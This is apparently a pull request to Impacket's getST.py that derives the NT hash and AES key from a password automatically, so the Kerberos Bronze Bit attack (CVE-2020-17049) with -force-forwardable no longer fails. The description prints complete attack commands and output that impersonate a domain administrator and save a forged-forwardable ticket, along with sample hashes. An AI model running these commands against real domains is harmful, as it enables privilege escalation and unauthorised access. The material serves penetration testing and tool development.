### PR TITLE
Compute NTHash and AESKey for the Bronze Bit attack automatically

### DIFF
--- a/examples/getST.py
+++ b/examples/getST.py
@@ -42,7 +42,7 @@ import os
 import random
 import struct
 import sys
-from binascii import unhexlify
+from binascii import hexlify, unhexlify
 from six import b
 
 from pyasn1.codec.der import decoder, encoder
@@ -54,11 +54,12 @@ from impacket.krb5 import constants
 from impacket.krb5.asn1 import AP_REQ, AS_REP, TGS_REQ, Authenticator, TGS_REP, seq_set, seq_set_iter, PA_FOR_USER_ENC, \
     Ticket as TicketAsn1, EncTGSRepPart, PA_PAC_OPTIONS, EncTicketPart
 from impacket.krb5.ccache import CCache
-from impacket.krb5.crypto import Key, _enctype_table, _HMACMD5, Enctype
+from impacket.krb5.crypto import Key, _enctype_table, _HMACMD5, _AES256CTS, Enctype
 from impacket.krb5.constants import TicketFlags, encodeFlags
 from impacket.krb5.kerberosv5 import getKerberosTGS
 from impacket.krb5.kerberosv5 import getKerberosTGT, sendReceive
 from impacket.krb5.types import Principal, KerberosTime, Ticket
+from impacket.ntlm import compute_nthash
 from impacket.winregistry import hexdump
 
 
@@ -227,8 +228,22 @@ class GETST:
                 try:
                     aesKey = unhexlify(aesKey)
                 except TypeError:
-                    pass         
-            
+                    pass
+
+            # Compute NTHash and AESKey if they're not provided in arguments
+            if self.__password != '' and self.__domain != '' and self.__user != '':
+                if not nthash:
+                    nthash = compute_nthash(self.__password)
+                    if logging.getLogger().level == logging.DEBUG:
+                        logging.debug('NTHash')
+                        print(hexlify(nthash).decode())
+                if not aesKey:
+                    salt = self.__domain.upper() + self.__user
+                    aesKey = _AES256CTS.string_to_key(self.__password, salt, params=None).contents
+                    if logging.getLogger().level == logging.DEBUG:
+                        logging.debug('AESKey')
+                        print(hexlify(aesKey).decode())
+
             # Get the encrypted ticket returned in the TGS. It's encrypted with one of our keys
             cipherText = tgs['ticket']['enc-part']['cipher']
             


### PR DESCRIPTION
In this PR I'd like to bring the automatic NTHash and AESKey computation when `-hashes` and `-aesKey` are not provided in arguments alongside with the `-force-forwardable` option in **getST.py**.

When executing the Bronze Bit attack with the `-force-forwardable` switch (RBCD abuse case), I ran into an issue of wrong key length:

```
$ getST.py -spn ldap/DC01.megacorp.local -impersonate 'administrator' -dc-ip 10.10.13.37 'megacorp.local/FakeMachineAccount:Passw0rd!' -force-forwardable
Impacket v0.9.23.dev1+20201209.133255.ac307704 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for user
[*] Impersonating administrator
[*]     Requesting S4U2self
[-] Wrong key length
```

This happens when the NTHash and AESKey values for `FakeMachineAccount` are not specified explicitly. If I set them with `-hashes` and `-aesKey` arguments, no issues occure:

```
$ getST.py -spn ldap/DC01.megacorp.local -impersonate 'administrator' -dc-ip 10.10.13.37 'megacorp.local/FakeMachineAccount' -force-forwardable -hashes :FC525C9683E8FE067095BA2DDC971889 -aesKey 2C0758881F508219F8FD15F1EBC04310D67569F44982C7B7278C9AC627C5F8F0
Impacket v0.9.23.dev1+20201209.133255.ac307704 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for user
[*] Impersonating administrator
[*]     Requesting S4U2self
[*]     Forcing the service ticket to be forwardable
[*]     Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache
```

In the original [research](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-attack/) @jakekarnes42 uses Mimikatz `kerberos::hash` to compute the hashes, but it can also be done automatically right in Python code.